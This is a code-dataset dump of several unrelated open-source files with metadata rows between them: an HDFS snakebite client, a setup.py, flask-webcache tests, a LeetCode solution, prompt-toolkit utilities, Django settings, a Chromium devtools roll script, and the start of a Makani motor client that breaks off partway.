        :param skip_trash: do or don't move deleted items into the trash first
        :type skip_trash: boolean, default is False (use trash)
        :return: list of deleted items
        """
        # NOTE(review): skip_trash is accepted for interface compatibility
        # but not forwarded to snakebite here -- confirm intended.
        return list(self.get_bite().delete(self.list_path(path), recurse=recursive))

    def chmod(self, path, permissions, recursive=False):
        """
        Use snakebite.chmod, if available.

        :param path: update-able file(s)
        :type path: either a string or sequence of strings
        :param permissions: \*nix style permission number
        :type permissions: octal
        :param recursive: change just listed entry(ies) or all in directories
        :type recursive: boolean, default is False
        :return: list of all changed items
        """
        # Accept octal permissions given as a string, e.g. "755".
        if isinstance(permissions, six.string_types):
            permissions = int(permissions, 8)
        return list(self.get_bite().chmod(self.list_path(path),
                                          permissions, recursive))

    def chown(self, path, owner, group, recursive=False):
        """
        Use snakebite.chown/chgrp, if available.

        One of owner or group must be set. Just setting group calls chgrp.

        :param path: update-able file(s)
        :type path: either a string or sequence of strings
        :param owner: new owner, can be blank
        :type owner: string
        :param group: new group, can be blank
        :type group: string
        :param recursive: change just listed entry(ies) or all in directories
        :type recursive: boolean, default is False
        :return: list of all changed items
        """
        bite = self.get_bite()
        if owner:
            if group:
                return all(bite.chown(self.list_path(path), "%s:%s" % (owner, group),
                                      recurse=recursive))
            return all(bite.chown(self.list_path(path), owner, recurse=recursive))
        return list(bite.chgrp(self.list_path(path), group, recurse=recursive))

    def count(self, path):
        """
        Use snakebite.count, if available.

        :param path: directory to count the contents of
        :type path: string
        :return: dictionary with content_size, dir_count and file_count keys
        """
        try:
            # The next() builtin works on both Python 2 and 3; the old
            # `.next()` method call broke on Python 3.
            res = next(self.get_bite().count(self.list_path(path)))
            dir_count = res['directoryCount']
            file_count = res['fileCount']
            content_size = res['spaceConsumed']
        except StopIteration:
            # Path matched nothing: report empty counts.
            dir_count = file_count = content_size = 0
        return {'content_size': content_size, 'dir_count': dir_count,
                'file_count': file_count}

    def get(self, path, local_destination):
        """
        Use snakebite.copyToLocal, if available.

        :param path: HDFS file
        :type path: string
        :param local_destination: path on the system running Luigi
        :type local_destination: string
        """
        return list(self.get_bite().copyToLocal(self.list_path(path),
                                                local_destination))

    def mkdir(self, path, parents=True, mode=0o755, raise_if_exists=False):
        """
        Use snakebite.mkdir, if available.

        Snakebite's mkdir method allows control over full path creation, so by
        default, tell it to build a full path to work like ``hadoop fs -mkdir``.

        :param path: HDFS path to create
        :type path: string
        :param parents: create any missing parent directories
        :type parents: boolean, default is True
        :param mode: \*nix style owner/group/other permissions
        :type mode: octal, default 0755
        """
        result = list(self.get_bite().mkdir(self.list_path(path),
                                            create_parent=parents, mode=mode))
        # "ile exists" matches both "File exists" and "file exists" in the
        # error message snakebite returns.
        if raise_if_exists and "ile exists" in result[0].get('error', ''):
            # NOTE(review): relies on luigi.target being reachable via the
            # top-level luigi package (module imports luigi.contrib.target)
            # -- confirm.
            raise luigi.target.FileAlreadyExists("%s exists" % (path, ))
        return result

    def listdir(self, path, ignore_directories=False, ignore_files=False,
                include_size=False, include_type=False, include_time=False,
                recursive=False):
        """
        Use snakebite.ls to get the list of items in a directory.

        :param path: the directory to list
        :type path: string
        :param ignore_directories: if True, do not yield directory entries
        :type ignore_directories: boolean, default is False
        :param ignore_files: if True, do not yield file entries
        :type ignore_files: boolean, default is False
        :param include_size: include the size in bytes of the current item
        :type include_size: boolean, default is False (do not include)
        :param include_type: include the type (d or f) of the current item
        :type include_type: boolean, default is False (do not include)
        :param include_time: include the last modification time of the current item
        :type include_time: boolean, default is False (do not include)
        :param recursive: list subdirectory contents
        :type recursive: boolean, default is False (do not recurse)
        :return: yield with a string, or if any of the include_* settings are
            true, a tuple starting with the path, and include_* items in order
        """
        bite = self.get_bite()
        for entry in bite.ls(self.list_path(path), recurse=recursive):
            if ignore_directories and entry['file_type'] == 'd':
                continue
            if ignore_files and entry['file_type'] == 'f':
                continue
            rval = [entry['path'], ]
            if include_size:
                rval.append(entry['length'])
            if include_type:
                rval.append(entry['file_type'])
            if include_time:
                # snakebite reports modification_time in milliseconds.
                rval.append(datetime.datetime.fromtimestamp(entry['modification_time'] / 1000))
            if len(rval) > 1:
                yield tuple(rval)
            else:
                yield rval[0]
| apache-2.0 | -2,731,325,352,027,294,000 | 38.90146 | 120 | 0.60697 | false | 4.171309 | true | false | false |
jonathanstrong/functor | setup.py | 1 | 1091 | #!/usr/bin/env python
# Bootstrap installation of Distribute
import distribute_setup
distribute_setup.use_setuptools()
import os
from setuptools import setup
# Package metadata consumed by the setup() call below.
PROJECT = u'Functor'
VERSION = '0.1'
URL = ''
AUTHOR = u'Jonathan Strong'
AUTHOR_EMAIL = u'[email protected]'
DESC = "Implements a function-object pattern in Python."
def read_file(file_name):
    """Return the contents of *file_name*, resolved relative to this file."""
    path = os.path.join(os.path.dirname(__file__), file_name)
    return open(path).read()
# Declarative package configuration; the metadata constants are defined above.
setup(
    name=PROJECT,
    version=VERSION,
    description=DESC,
    long_description=read_file('README.md'),
    author=AUTHOR,
    author_email=AUTHOR_EMAIL,
    url=URL,
    # NOTE(review): setuptools normally expects a short license identifier
    # here; passing the whole LICENSE file text is unusual -- confirm intended.
    license=read_file('LICENSE'),
    namespace_packages=[],
    packages=[u'functor'],
    include_package_data=True,
    zip_safe=False,
    install_requires=[
        # -*- Requirements -*-
    ],
    entry_points = {
        # -*- Entry points -*-
    },
    classifiers=[
        # see http://pypi.python.org/pypi?:action=list_classifiers
        # -*- Classifiers -*-
        "Programming Language :: Python",
    ],
)
| mit | 4,604,809,639,414,675,000 | 20.82 | 63 | 0.628781 | false | 3.519355 | false | false | false |
fusic-com/flask-webcache | tests/test_storage.py | 1 | 12927 | from __future__ import unicode_literals
import unittest
from datetime import timedelta, datetime
from six.moves.cPickle import dumps, loads
from six import iteritems
from flask import Flask, send_file
from werkzeug.wrappers import Response
from werkzeug.datastructures import HeaderSet
from werkzeug.contrib.cache import SimpleCache
from flask_webcache.storage import Config, Metadata, Store, Retrieval
from flask_webcache.storage import (CacheMiss, NoResourceMetadata, NoMatchingRepresentation, NotFreshEnoughForClient,
RecacheRequested)
from flask_webcache.recache import RECACHE_HEADER
from flask_webcache.utils import werkzeug_cache_get_or_add
from testutils import compare_numbers
a = Flask(__name__)
class UtilsTestCase(unittest.TestCase):
    """Tests for the Config and Metadata helper datastructures."""

    def test_config_kwargs(self):
        """Config() rejects unknown keyword arguments."""
        with self.assertRaises(TypeError):
            Config(foo=1)

    def test_metadata_datastructure(self):
        """Metadata keeps salt/vary, survives pickling, compares by value."""
        def check_metadata(m):
            # assertEqual/assertNotEqual replace the deprecated
            # assertEquals/assertNotEquals aliases (removed in Python 3.12).
            self.assertEqual(m.salt, 'qux')
            self.assertIn('foo', m.vary)
            self.assertIn('bar', m.vary)
        m = Metadata(HeaderSet(('foo', 'bar')), 'qux')
        check_metadata(m)
        # A pickle round-trip must preserve the structure.
        check_metadata(loads(dumps(m)))
        m2 = Metadata(HeaderSet(('foo', 'bar')), 'qux')
        self.assertEqual(m, m2)
        m3 = Metadata(HeaderSet(('foo', 'bar')), 'notqux')
        self.assertNotEqual(m2, m3)
class StorageTestCase(unittest.TestCase):
def setUp(self):
self.c = SimpleCache()
self.s = Store(self.c)
self.r = Retrieval(self.c)
def test_basic_cachability(self):
with a.test_request_context('/foo'):
self.assertFalse(self.s.should_cache_response(Response(x for x in 'foo')))
self.assertTrue(self.s.should_cache_response(Response(status=204)))
self.assertFalse(self.s.should_cache_response(Response(status=500)))
self.assertTrue(self.s.should_cache_response(Response('foo')))
self.assertTrue(self.s.should_cache_response(Response()))
r = Response()
r.vary.add('*')
self.assertFalse(self.s.should_cache_response(r))
with a.test_request_context('/foo', method='HEAD'):
self.assertFalse(self.s.should_cache_response(Response('foo')))
with a.test_request_context('/foo', method='POST'):
self.assertFalse(self.s.should_cache_response(Response('foo')))
def test_cache_control_cachability(self):
def check_response_with_cache_control(**cc):
r = Response()
for k, v in iteritems(cc):
setattr(r.cache_control, k, v)
return self.s.should_cache_response(r)
with a.test_request_context():
self.assertTrue(check_response_with_cache_control(max_age=10))
self.assertTrue(check_response_with_cache_control(must_revalidate=True))
self.assertFalse(check_response_with_cache_control(max_age=0))
self.assertFalse(check_response_with_cache_control(private=True))
self.assertFalse(check_response_with_cache_control(no_cache=True))
self.assertFalse(check_response_with_cache_control(no_store=True))
def test_expire_cachability(self):
def check_response_with_expires(dt):
r = Response()
r.expires = dt
return self.s.should_cache_response(r)
with a.test_request_context():
self.assertFalse(check_response_with_expires(datetime.utcnow() - timedelta(seconds=1)))
self.assertTrue(check_response_with_expires(datetime.utcnow() + timedelta(seconds=1)))
def test_default_cachability(self):
with a.test_request_context('/foo'):
self.assertTrue(self.s.should_cache_response(Response()))
with a.test_request_context('/foo', query_string='?bar'):
self.assertFalse(self.s.should_cache_response(Response()))
def test_x_cache_headers(self):
r = Response()
self.s.mark_cache_hit(r)
self.assertEquals(r.headers[self.s.X_CACHE_HEADER], 'hit')
self.s.mark_cache_miss(r)
self.assertEquals(r.headers[self.s.X_CACHE_HEADER], 'miss')
def test_metadata_miss(self):
with self.assertRaises(NoResourceMetadata):
with a.test_request_context('/foo'):
self.r.fetch_metadata()
def test_response_miss(self):
with self.assertRaises(NoResourceMetadata):
with a.test_request_context('/foo'):
self.r.fetch_response()
def test_store_retrieve_cycle(self):
with a.test_request_context('/foo'):
r = Response('foo')
self.s.cache_response(r)
self.assertEquals(len(self.c._cache), 2)
r2 = self.r.fetch_response()
self.assertEquals(r.data, r2.data)
def test_vary_miss(self):
with a.test_request_context('/foo', headers=(('accept-encoding', 'gzip'),)):
r = Response('foo')
r.vary.add('accept-encoding')
r.content_encoding = 'gzip'
self.s.cache_response(r)
with self.assertRaises(NoMatchingRepresentation):
with a.test_request_context('/foo'):
self.r.fetch_response()
def test_invalidation_condition(self):
with a.test_request_context('/foo', method="PUT"):
r = Response('foo')
self.assertTrue(self.s.should_invalidate_resource(r))
r = Response('foo', status=500)
self.assertFalse(self.s.should_invalidate_resource(r))
with a.test_request_context('/foo'):
r = Response('foo')
self.assertFalse(self.s.should_invalidate_resource(r))
def test_invalidation(self):
with a.test_request_context('/foo'):
r = Response('foo')
self.s.cache_response(r)
self.assertEquals(len(self.c._cache), 2)
with a.test_request_context('/foo', method="PUT"):
r = Response('foo')
self.assertTrue(self.s.should_invalidate_resource(r))
self.s.invalidate_resource()
self.assertEquals(len(self.c._cache), 1)
with self.assertRaises(CacheMiss):
with a.test_request_context('/foo'):
self.r.fetch_response()
def test_master_salt_invalidation(self):
with a.test_request_context('/foo'):
r = Response('foo')
self.s.cache_response(r)
self.assertEquals(self.r.fetch_response().data, b'foo')
self.r.config.master_salt = 'newsalt'
with self.assertRaises(NoMatchingRepresentation):
self.r.fetch_response()
def test_request_cache_controls(self):
with a.test_request_context('/foo'):
self.assertTrue(self.r.should_fetch_response())
with a.test_request_context('/foo', method='HEAD'):
self.assertTrue(self.r.should_fetch_response())
with a.test_request_context('/foo', method='POST'):
self.assertFalse(self.r.should_fetch_response())
with a.test_request_context('/foo', headers=(('cache-control', 'no-cache'),)):
self.assertFalse(self.r.should_fetch_response())
with a.test_request_context('/foo', headers=(('pragma', 'no-cache'),)):
self.assertFalse(self.r.should_fetch_response())
with a.test_request_context('/foo', headers=(('cache-control', 'max-age=0'),)):
self.assertFalse(self.r.should_fetch_response())
with a.test_request_context('/foo', headers=(('cache-control', 'max-age=5'),)):
self.assertTrue(self.r.should_fetch_response())
def test_response_freshness_seconds(self):
# this test is raced; if running it takes about a second, it might fail
r = Response()
self.assertEquals(0, self.r.response_freshness_seconds(r))
r.date = datetime.utcnow()
self.assertTrue(compare_numbers(self.s.DEFAULT_EXPIRATION_SECONDS,
self.r.response_freshness_seconds(r),
1))
r.expires = datetime.utcnow() + timedelta(seconds=345)
self.assertTrue(compare_numbers(345, self.r.response_freshness_seconds(r), 1))
r.cache_control.max_age=789
self.assertTrue(compare_numbers(789, self.r.response_freshness_seconds(r), 1))
def test_min_fresh(self):
# this test is raced; if running it takes about a second, it might fail
r = Response()
r.date = datetime.utcnow() - timedelta(seconds=100)
r.cache_control.max_age = 200
f = self.r.response_freshness_seconds(r)
with a.test_request_context('/foo', headers=(('cache-control', 'min-fresh=50'),)):
try:
self.r.verify_response_freshness_or_miss(r, f)
except CacheMiss:
self.fail('unexpected CacheMiss on reasonably fresh response')
with a.test_request_context('/foo', headers=(('cache-control', 'min-fresh=150'),)):
self.assertRaises(NotFreshEnoughForClient, self.r.verify_response_freshness_or_miss, r, f)
def test_request_cache_control_disobedience(self):
c = SimpleCache()
cfg = Config(request_controls_cache=False)
s = Store(c, cfg)
r = Retrieval(c, cfg)
with a.test_request_context('/foo', headers=(('cache-control', 'no-store'),)):
self.assertTrue(r.should_fetch_response())
with a.test_request_context('/foo', headers=(('cache-control', 'no-store'),)):
self.assertTrue(s.should_cache_response(Response()))
with a.test_request_context('/foo', headers=(('cache-control', 'no-store'),)):
self.assertTrue(s.should_cache_response(Response()))
resp = Response()
resp.date = datetime.utcnow() - timedelta(seconds=100)
resp.cache_control.max_age = 200
with a.test_request_context('/foo', headers=(('cache-control', 'min-fresh=150'),)):
f = self.r.response_freshness_seconds(resp)
try:
r.verify_response_freshness_or_miss(resp, f)
except CacheMiss:
self.fail('unexpected CacheMiss when ignoring request cache control')
def test_sequence_converted_responses(self):
with a.test_request_context('/foo'):
r = Response(f for f in 'foo')
r.make_sequence()
self.assertFalse(self.s.should_cache_response(r))
r = send_file(__file__)
r.make_sequence()
self.assertFalse(self.s.should_cache_response(r))
class RecacheTestCase(unittest.TestCase):
def setUp(self):
self.recached = False
def dispatcher(salt):
self.recached = True
self.c = SimpleCache()
cfg = Config(preemptive_recache_seconds=10, preemptive_recache_callback=dispatcher)
self.s = Store(self.c, cfg)
self.r = Retrieval(self.c, cfg)
def test_preemptive_recaching_predicate(self):
m = Metadata(HeaderSet(('foo', 'bar')), 'qux')
def mkretr(**kwargs):
return Retrieval(self.c, Config(**kwargs))
with a.test_request_context('/'):
self.assertFalse(mkretr(preemptive_recache_seconds=10).should_recache_preemptively(10, m))
self.assertFalse(mkretr(preemptive_recache_callback=lambda x: 0).should_recache_preemptively(10, m))
self.assertFalse(self.r.should_recache_preemptively(11, m))
self.assertTrue(self.r.should_recache_preemptively(10, m))
self.assertFalse(self.r.should_recache_preemptively(10, m))
self.c.clear()
self.assertTrue(self.r.should_recache_preemptively(10, m))
def test_preemptive_recaching_cache_bypass(self):
fresh = Response('foo')
with a.test_request_context('/foo'):
self.s.cache_response(fresh)
metadata = self.r.fetch_metadata()
with a.test_request_context('/foo'):
cached = self.r.fetch_response()
self.assertEquals(cached.headers[self.r.X_CACHE_HEADER], 'hit')
with a.test_request_context('/foo', headers={RECACHE_HEADER: metadata.salt}):
self.assertRaises(RecacheRequested, self.r.fetch_response)
with a.test_request_context('/foo', headers={RECACHE_HEADER: 'incorrect-salt'}):
try:
self.r.fetch_response()
except RecacheRequested:
self.fail('unexpected RecacheRequested for incorrect salt')
class UtilityTestCase(unittest.TestCase):
def setUp(self):
self.c = SimpleCache()
def test_werkzeug_cache_get_or_add_missing_key(self):
self.assertEquals('bar', werkzeug_cache_get_or_add(self.c, 'foo', 'bar', 10))
def test_werkzeug_cache_get_or_add_existing_key(self):
self.c.set('foo', 'bar')
self.assertEquals('bar', werkzeug_cache_get_or_add(self.c, 'foo', 'qux', 10))
| mit | -3,667,972,195,193,208,300 | 45.003559 | 117 | 0.61886 | false | 3.773205 | true | false | false |
eroicaleo/LearningPython | interview/leet/124_Binary_Tree_Maximum_Path_Sum.py | 1 | 1054 | #!/usr/bin/env python
from tree import *
class Solution:
def maxPathSum(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if root == None:
return 0
self.maxSum = root.val
self.maxPathSumNode(root)
return self.maxSum
def maxPathSumNode(self, node):
if node == None:
return 0
leftSum = self.maxPathSumNode(node.left)
rightSum = self.maxPathSumNode(node.right)
self.maxSum = max(leftSum+node.val, rightSum+node.val, leftSum+node.val+rightSum, self.maxSum, node.val)
print('leftSum: %d, rightSum: %d, node.val: %d, self.maxSum: %d' % (leftSum, rightSum, node.val, self.maxSum))
ret = max(leftSum+node.val, rightSum+node.val, node.val)
print('node.val: %d, ret: %d' % (node.val, ret))
return ret
sol = Solution()
nodeString = "[-10,9,20,null,null,15,7]"
nodeString = "[1,2,3]"
nodeString = "[1,-2,-3,1,3,-2,null,-1]"
root = treeBuilder(nodeString)
traverse(root)
print(sol.maxPathSum(root))
| mit | -2,902,822,416,752,697,000 | 30 | 118 | 0.598672 | false | 3.020057 | false | false | false |
niklasf/python-prompt-toolkit | prompt_toolkit/layout/utils.py | 1 | 2590 | from __future__ import unicode_literals
from prompt_toolkit.utils import get_cwidth
__all__ = (
'token_list_len',
'token_list_width',
'token_list_to_text',
'explode_tokens',
'find_window_for_buffer_name',
)
def token_list_len(tokenlist):
"""
Return the amount of characters in this token list.
:param tokenlist: List of (token, text) or (token, text, mouse_handler)
tuples.
"""
return sum(len(item[1]) for item in tokenlist)
def token_list_width(tokenlist):
"""
Return the character width of this token list.
(Take double width characters into account.)
:param tokenlist: List of (token, text) or (token, text, mouse_handler)
tuples.
"""
return sum(get_cwidth(c) for item in tokenlist for c in item[1])
def token_list_to_text(tokenlist):
"""
Concatenate all the text parts again.
"""
return ''.join(item[1] for item in tokenlist)
def iter_token_lines(tokenlist):
"""
Iterator that yields tokenlists for each line.
"""
line = []
for token, c in explode_tokens(tokenlist):
line.append((token, c))
if c == '\n':
yield line
line = []
yield line
def split_lines(tokenlist):
"""
Take a single list of (Token, text) tuples and yield one such list for each
line.
"""
line = []
for token, string in tokenlist:
items = string.split('\n')
for item in items[:-1]:
if item:
line.append((token, item))
yield line
line = []
line.append((token, items[-1]))
if line:
yield line
def explode_tokens(tokenlist):
"""
Turn a list of (token, text) tuples into another list where each string is
exactly one character.
:param tokenlist: List of (token, text) tuples.
"""
result = []
for token, string in tokenlist:
for c in string:
result.append((token, c))
return result
def find_window_for_buffer_name(layout, buffer_name):
"""
Look for a :class:`~prompt_toolkit.layout.containers.Window` in the Layout
that contains the :class:`~prompt_toolkit.layout.controls.BufferControl`
for the given buffer and return it. If no such Window is found, return None.
"""
from .containers import Window
from .controls import BufferControl
for l in layout.walk():
if isinstance(l, Window) and isinstance(l.content, BufferControl):
if l.content.buffer_name == buffer_name:
return l
| bsd-3-clause | 693,291,599,595,765,100 | 23.205607 | 80 | 0.602317 | false | 3.894737 | false | false | false |
devbitstudio/portfolio | settings.py | 1 | 5950 | # Django settings for devbitstudio project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DOMAIN = 'devbitstudio.com'
EMAIL_HOST = 'localhost'
EMAIL_PORT = 25
#~ DEFAULT_FROM_EMAIL = '[email protected]'
SERVER_EMAIL = '[email protected]'
EMAIL_SUBJECT_PREFIX = 'DevBitStudio - '
CURRENT_PATH = os.path.abspath(os.path.dirname(__file__).decode('utf-8'))
PROJECT_DIR = os.path.dirname(__file__)
RESULTS_PER_PAGE = 12
ADMINS = (
('William Ibarra Rodriguez', '[email protected]'),
('Miguel Pelfort Paz', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'devbitstudio', # Or path to database file if using sqlite3.
'USER': 'root', # Not used with sqlite3.
'PASSWORD': 'root', # Not used with sqlite3.
'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.join(PROJECT_DIR, 'uploads/')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''#os.path.join(PROJECT_DIR, 'static/')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(PROJECT_DIR, 'static/'),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'iea9ivk!*ms-#$i%ix0i0b3p=u&30v+h*)&c5!%byv^i6^15%3'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'marketing.urlcanon.URLCanonicalizationMiddleware',
)
ROOT_URLCONF = 'devbitstudio.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(os.path.dirname(__file__),'templates').replace('\\', '/'),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
'main',
'django.contrib.sitemaps',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
# for use with URL Canonicalization Middleware:
# this is the canonical hostname to be used by your app (required)
CANON_URL_HOST = 'devbitstudio.com'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| mit | -7,184,461,981,706,605,000 | 32.806818 | 120 | 0.689412 | false | 3.573574 | false | false | false |
ChromeDevTools/devtools-frontend | scripts/deps/roll_deps.py | 2 | 2410 | #!/usr/bin/env vpython
#
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Update manually maintained dependencies from Chromium.
"""
import argparse
import os
import shutil
import subprocess
import sys
# Files whose location within devtools-frontend matches the upstream location.
FILES = [
'v8/include/js_protocol.pdl',
'third_party/blink/renderer/core/css/css_properties.json5',
'third_party/blink/renderer/core/html/aria_properties.json5',
'third_party/blink/public/devtools_protocol/browser_protocol.pdl',
]
# Files whose location within devtools-frontend differs from the upstream location.
FILE_MAPPINGS = {
# chromium_path => devtools_frontend_path
'components/variations/proto/devtools/client_variations.js':
'front_end/third_party/chromium/client-variations/ClientVariations.js',
'third_party/axe-core/axe.d.ts': 'front_end/third_party/axe-core/axe.d.ts',
'third_party/axe-core/axe.js': 'front_end/third_party/axe-core/axe.js',
'third_party/axe-core/axe.min.js':
'front_end/third_party/axe-core/axe.min.js',
'third_party/axe-core/LICENSE': 'front_end/third_party/axe-core/LICENSE',
}
for f in FILES:
FILE_MAPPINGS[f] = f
def parse_options(cli_args):
parser = argparse.ArgumentParser(description='Roll dependencies from Chromium.')
parser.add_argument('chromium_dir', help='path to chromium/src directory')
parser.add_argument('devtools_dir',
help='path to devtools/devtools-frontend directory')
return parser.parse_args(cli_args)
def update(options):
subprocess.check_call(['git', 'fetch', 'origin'], cwd=options.chromium_dir)
subprocess.check_call(['git', 'checkout', 'origin/main'],
cwd=options.chromium_dir)
subprocess.check_call(['gclient', 'sync'], cwd=options.chromium_dir)
def copy_files(options):
for from_path, to_path in FILE_MAPPINGS.items():
from_path = os.path.normpath(from_path)
to_path = os.path.normpath(to_path)
print('%s => %s' % (from_path, to_path))
shutil.copy(os.path.join(options.chromium_dir, from_path),
os.path.join(options.devtools_dir, to_path))
if __name__ == '__main__':
OPTIONS = parse_options(sys.argv[1:])
update(OPTIONS)
copy_files(OPTIONS)
| bsd-3-clause | 2,989,384,766,150,173,000 | 36.076923 | 84 | 0.692946 | false | 3.347222 | false | false | false |
google/makani | avionics/motor/motor_client.py | 1 | 50178 | #!/usr/bin/python
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command line client for controlling motors."""
import collections
import os
import re
import socket
import subprocess
import tempfile
import threading
import time
import makani
from makani.avionics.common import actuator_types
from makani.avionics.common import aio
from makani.avionics.common import cmd_client
from makani.avionics.common import pack_avionics_messages
from makani.avionics.common import safety_codes
from makani.avionics.firmware.params import client as param_client
from makani.avionics.motor.firmware import config_params
from makani.avionics.motor.firmware import flags
from makani.avionics.network import aio_labels
from makani.avionics.network import aio_node
from makani.avionics.network import message_type
from makani.lib.python import c_helpers
import numpy as np
from scipy import interpolate
# TODO: implement NetworkConfig() to replace all these EnumHelper's.
# EnumHelpers translate between the generated C enum names
# (e.g. 'kAioNodeMotorSbo'), their short names, and their integer values.
aio_node_helper = c_helpers.EnumHelper('AioNode', aio_node)
motor_label_helper = c_helpers.EnumHelper('MotorLabel', aio_labels,
                                          prefix='kMotor')
motor_error_helper = c_helpers.EnumHelper('MotorError', flags)
motor_warning_helper = c_helpers.EnumHelper('MotorWarning', flags)
def BuildMotorParamDict():
  """Builds a dict mapping motor param names to their indices."""
  # Read the motor I/O source file that declares the mutable parameter table.
  io_path = os.path.join(makani.HOME, 'avionics/motor/firmware/io.c')
  with open(io_path) as io_file:
    io_source = io_file.read()

  # Locate the g_mutable_param_addrs array definition in the source text.
  array_match = re.search(
      r'static float \*g_mutable_param_addrs\[\] = {\s*^([\s\S]*)^};',
      io_source, re.MULTILINE)

  # Each array entry looks like "&struct.field"; the parameter's index is its
  # position within the array.
  names = re.findall(r'^ *&[\w\[\]]+.([\w\.\[\]]+)',
                     array_match.group(0), re.MULTILINE)
  return dict((name, index) for index, name in enumerate(names))
# Constants.
# Upper-case motor nicknames (e.g. 'SBO') accepted on the command line.
MOTORS = [mot.upper() for mot in motor_label_helper.ShortNames()]
CONTROLLER = 'kAioNodeControllerA'
OPERATOR = 'kAioNodeOperator'
# Maps mutable motor parameter names to the indices used by io.c.
MOTOR_PARAMS = BuildMotorParamDict()
# Bitmask-to-name lookups; the catch-all '...All' entries are excluded so
# decoding a bitmask yields only individual error/warning names.
MOTOR_ERROR_NAMES = collections.OrderedDict(
    (error_bitmask, motor_error_helper.Name(error_bitmask))
    for error_bitmask in motor_error_helper.Values()
    if motor_error_helper.Name(error_bitmask) != 'kMotorErrorAll')
MOTOR_WARNING_NAMES = collections.OrderedDict(
    (warning_bitmask, motor_warning_helper.Name(warning_bitmask))
    for warning_bitmask in motor_warning_helper.Values()
    if motor_warning_helper.Name(warning_bitmask) != 'kMotorWarningAll')
# Maps kMotorStatus* integer values back to their constant names.
MOTOR_STATUS_NAMES = {val: key for key, val in flags.__dict__.items()
                      if key.startswith('kMotorStatus')}
# Script that converts a Python command description into a lookup table.
GEN_TABLE_PATH = os.path.join(makani.HOME,
                              'avionics/motor/gen_lookup_table.py')
# Absolute command limits enforced before sending speed/torque commands.
# NOTE(review): presumably rad/s for omega and N-m for torque -- confirm.
OMEGA_MIN_LIMIT = -260.0
OMEGA_MAX_LIMIT = 260.0
TORQUE_MIN_LIMIT = -600.0
TORQUE_MAX_LIMIT = 600.0
# Machine epsilon for 32-bit floats.
EPS32 = np.finfo(np.float32).eps
class MotorClientError(cmd_client.WingClientError):
  """Raised for user-facing motor client failures (bad input or bad state)."""
  pass
def MotorsAsBits(motor_list):
  """Returns a bitmask describing the motors in `motor_list`."""
  # Each motor label maps to a distinct bit position; sum combines them
  # exactly as the original bit-shift accumulation did.
  bit_values = [1 << motor_label_helper.Value(motor.capitalize())
                for motor in motor_list]
  return sum(bit_values)
def AioNodeNameFromMotorNickname(motor):
